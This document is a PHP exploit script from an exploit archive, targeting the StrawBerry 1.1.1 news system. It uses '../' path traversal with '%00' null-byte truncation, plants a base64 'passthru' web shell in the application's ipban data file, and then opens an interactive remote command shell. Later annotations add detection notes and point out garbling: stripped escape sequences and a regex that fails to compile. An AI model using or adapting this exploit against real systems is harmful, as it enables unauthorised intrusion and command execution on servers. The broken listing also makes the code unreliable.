
# Title : StrawBerry 1.1.1 LFI / Remote Command Execution Exploit
# Published : 2009-05-14
# Author : [AVT]


<?php

/*********************************************************************
 * StrawBerry 1.1.1 LFI / Remote Command Execution Exploit           *
 * Site: http://strawberry.goodgirl.ru/                              *
 *********************************************************************
 * magic_quotes_gpc = Off                                            *
 *********************************************************************
 * Author: [AVT]                                                     *
 * Date : 10.05.09                                                   *
 * My Site: http://antichat.ru/                                      *
 *********************************************************************/
// Script entry: takes [host] [path] from argv, probes the target once, and
// then drops into the interactive loop. error_reporting(0) silences every
// notice/warning this file would otherwise raise (several variables below
// are appended to with `.=` before being initialised), so failures surface
// only as empty output.
set_time_limit(0);
error_reporting(0);
// NOTE(review): destructuring runs before the argc check, so with fewer than
// two arguments $host/$path are simply unset (the notice is suppressed above).
list($cli,$host,$path) = $argv;

if ($argc != 3) {  
    
    // Usage banner. The stray `n`/`r` at the edges of these strings look like
    // escape sequences whose backslashes were lost when the listing was
    // archived; they are reproduced verbatim.
    print "no-------------------------------------------------------------on";
    print "r|   StrawBerry 1.1.1 LFI / Remote Command Execution Exploit   |n";
    print "r|           Site: http://strawberry.goodgirl.ru/              |n";
    print "ro-------------------------------------------------------------on";
    print "r| Author: [AVT]                                               |n";
    print "r| My Site: http://antichat.ru/                                |n";
    print "ro-------------------------------------------------------------on";
    print "r| Usage:   php expl.php [host] [path]                         |n";
    print "r| host     localhost                                          |n";
    print "r| path     /news/                                             |n";
    print "r| Example: php expl.php site.com /news/                       |n";
    print "ro-------------------------------------------------------------on";
    exit;      
}         
// check_host() exits the process when its probe fails; it returns true when
// the response does not yet contain '<code>' and false when it already does,
// so post_shell() runs at most once per target.
if (check_host ())
	{
	post_shell();
	}
// Unconditional: reached whenever check_host() did not exit.
use_shell();

/**
 * Probe the target by requesting db/base/ipban.MYD through the `do` parameter.
 *
 * Builds a raw GET whose `do` value is a `../` traversal ending in `%00`
 * (null-byte truncation — presumably of a suffix the application appends;
 * the application code is not on this page) and sends it with send().
 * Reads the globals $host and $path assigned at top level.
 *
 * Returns true when the body contains 'a:' (presumably the prefix of a
 * PHP serialize()d array — hedged, the file format is not shown here) but
 * no '<code>', false when '<code>' is already present, and terminates the
 * process with a "Exploit Failed!" banner when 'a:' is absent.
 *
 * Detection note: `../` combined with `%00` in the `do` parameter of
 * example/index.php is the request pattern a WAF or access-log rule
 * should flag.
 */
function check_host ()
	{
	global $host,$path;
	// Stray `rn` fragments are stripped escape sequences (archiving artifact).
	$data = "GET {$path}example/index.php?do=../../../../db/base/ipban.MYD%00 HTTP/1.1rn";
	$data .= "Host: $hostrn";
	$data .= "Connection: closernrn";
	$html = send ($host,$data);
    	if (!stristr($html,'a:')) 
		{
		print "ro-------------------------------------------------------------on";
		print "r| Exploit Failed!                                             |n";
		print "ro-------------------------------------------------------------on";
		exit;
    		}
	elseif (stristr($html,'<code>'))
		{
		// Marker already present: the caller skips post_shell().
		return false;
    		}
	else
		{
		return true;
		}
	}


/**
 * Open a plain TCP socket to $host on port 80, write the raw request $data,
 * and return everything read until the server closes the connection.
 *
 * Dies with a message when the connect fails (the `@` hides fsockopen's
 * warning). $html is appended to without being initialised — a notice that
 * error_reporting(0) at top level suppresses. Because the read loop only
 * ends at EOF, it relies on the server closing the socket: check_host() and
 * exec_cmd() send `Connection: close`, post_shell() does not.
 */
function send ($host,$data) 
	{
	if (!$sock = @fsockopen($host,80)) 
		{
		die("Connection refused, try again!n");
    		}   	
	fputs($sock,$data);
	while (!feof($sock)) { $html .= fgets($sock); }
	fclose($sock);
	return $html;
	}

/**
 * Plant the `<code>…</code>` PHP string built below into the ipban data.
 *
 * POSTs add_ip=<payload>&action=add&mod=ipban while the `do` parameter
 * points, via the same `../` + `%00` traversal, at inc/mod/ipban.mdu.
 * Reads the globals $host and $path. The response from send() is discarded,
 * so success is only inferred later when exec_cmd() finds the marker.
 * $data is appended to without initialisation (notice suppressed).
 *
 * Detection note: the literal payload string appearing inside
 * db/base/ipban.MYD, or a POST whose `do` parameter targets ipban.mdu,
 * is a clear compromise indicator for this application.
 */
function post_shell() 
	{
	global $host,$path;
	$post  = "add_ip=" . urlencode('<code><?php passthru(base64_decode($_GET[cmd]));?></code>') . "&action=add&mod=ipban";
	// Stray `rn` fragments are stripped escape sequences (archiving artifact).
	$data .= "POST {$path}example/index.php?do=../../../../../inc/mod/ipban.mdu%00 HTTP/1.1rn";
	$data .= "Host: $hostrn";
	$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
	$data .= "Content-Type: application/x-www-form-urlencodedrn";
	$data .= "Content-Length: ".strlen($post)."rnrn";
	$data .= "$postrnrn";
	// No `Connection: close` here, so send() waits for the server to hang up.
	send ($host,$data);
	}


/**
 * Interactive loop: print a prompt, read one line from STDIN, print what
 * exec_cmd() returns for it, repeat.
 *
 * "exit"/"quit", optionally prefixed with "--" and case-insensitive,
 * terminate the process via die(). stripslashes() undoes backslash
 * escaping on the typed line before it is sent. The loop never returns;
 * set_time_limit(0) at top level keeps PHP from aborting it.
 */
function use_shell()
	{
    	while (1) 
		{
        	echo "[Shell]~$: "; 
        	$cmd = stripslashes(trim(fgets(STDIN)));  
        	if (preg_match('/^(exit|--exit|quit|--quit)$/i',$cmd)) die("nExitedn");
        	print exec_cmd($cmd);     
		}
	}


/**
 * Send one command to the planted payload and return the captured output.
 *
 * The command travels base64-encoded in the `cmd` query parameter next to
 * the same traversal `do` value that check_host() uses; presumably the
 * application then includes the ipban data file, executing the string
 * post_shell() stored there (the application side is not on this page).
 * Reads the globals $host and $path. Returns the first capture group of
 * the <code>…</code> match on the response body.
 *
 * NOTE(review): the pattern below uses `/` as its delimiter but also
 * contains an unescaped `/` in `</code>`, so as written the regex fails to
 * compile (warning suppressed by error_reporting(0)), no capture is made,
 * and the function returns null. This is consistent with the other stripped
 * escape sequences in this listing. $data is appended to uninitialised.
 */
function exec_cmd($cmd) 
	{
	global $host,$path;

	$cmd = base64_encode($cmd);
	// Stray `rn` fragments are stripped escape sequences (archiving artifact).
	$data .= "GET {$path}example/index.php?cmd={$cmd}&do=../../../../db/base/ipban.MYD%00 HTTP/1.1rn";
	$data .= "Host: $hostrn";
	$data .= "Connection: closernrn";
	$html = send ($host,$data);
	preg_match_all('/<code>(.*)</code>/si', $html, $match);
	return $match[1][0];
	}

?>
